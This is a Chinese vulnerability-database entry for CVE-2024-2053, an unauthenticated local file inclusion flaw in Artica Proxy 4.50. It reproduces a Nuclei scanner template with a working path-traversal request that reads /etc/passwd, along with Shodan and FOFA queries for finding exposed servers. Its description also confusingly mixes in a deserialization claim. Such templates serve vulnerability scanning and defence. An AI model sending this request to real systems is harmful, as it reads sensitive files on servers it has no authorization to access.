Artica Proxy Unauthenticated LFI Vulnerability

漏洞信息

漏洞名称: Artica Proxy Unauthenticated LFI Vulnerability

漏洞编号:

  • CVE: CVE-2024-2053

漏洞类型: 文件读取

漏洞等级: 高危

漏洞描述: Artica Proxy是一款广泛使用的代理服务器管理软件,提供Web管理界面,常见于企业网络环境中,用于管理网络流量和代理服务。该软件的Web管理界面在4.50版本中存在未授权本地文件包含(LFI)漏洞,允许未经认证的用户通过构造特定的HTTP请求,绕过安全限制,读取服务器上的任意文件。漏洞的根源在于Web应用程序未能正确验证用户提供的输入,导致攻击者可以利用路径遍历技术访问受限文件。此漏洞可能导致敏感信息泄露,如系统密码文件,进而可能被用于进一步的攻击。由于攻击者无需认证即可利用此漏洞,且攻击过程可以自动化,因此该漏洞的安全风险较高,建议用户及时更新到修复版本。

产品厂商: articatech

产品名称: artica_proxy

影响版本: 4.50

搜索语法: http.html:”artica” OR body=”artica”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/c038a828a506aac8054c6f1527aed1f7cf3427b7/http%2Fcves%2F2024%2FCVE-2024-2053.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53

id: CVE-2024-2053

info:
  name: Artica Proxy  - Unauthenticated LFI
  author: pussycat0x
  severity: high
  description: |
    The Artica Proxy administrative web application will deserialize arbitrary PHP objects supplied by unauthenticated users and subsequently enable code execution as the "www-data" user. This issue was demonstrated on version 4.50 of the The Artica-Proxy administrative web application attempts to prevent local file inclusion. These protections can be bypassed and arbitrary file requests supplied by unauthenticated users will be returned according to the privileges of the "www-data" user.
  reference:
    - https://github.com/0xMarcio/cve/blob/main/2024/CVE-2024-2053.md#cve-2024-2053
    - https://seclists.org/fulldisclosure/2024/Mar/11
    - https://korelogic.com/Resources/Advisories/KL-001-2024-001.txt
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-2053
    cwe-id: CWE-23
    epss-score: 0.00434
    epss-percentile: 0.61897
    cpe: cpe:2.3:a:articatech:artica_proxy:4.40:*:*:*:*:*:*:*
  metadata:
    vendor: articatech
    product: artica_proxy
    shodan-query: http.html:"artica"
    fofa-query: body="artica"
    verified: true
    max-request: 1
  tags: cve,cve2024,lfi,artica-proxy,articatech

http:
  - raw:
      - |
        GET /images.listener.php?uri=1&mailattach=..././..././..././..././..././epasswdtc/ppasswdasswd HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: word
        part: body
        words:
          - "application/force-download"

      - type: status
        status:
          - 200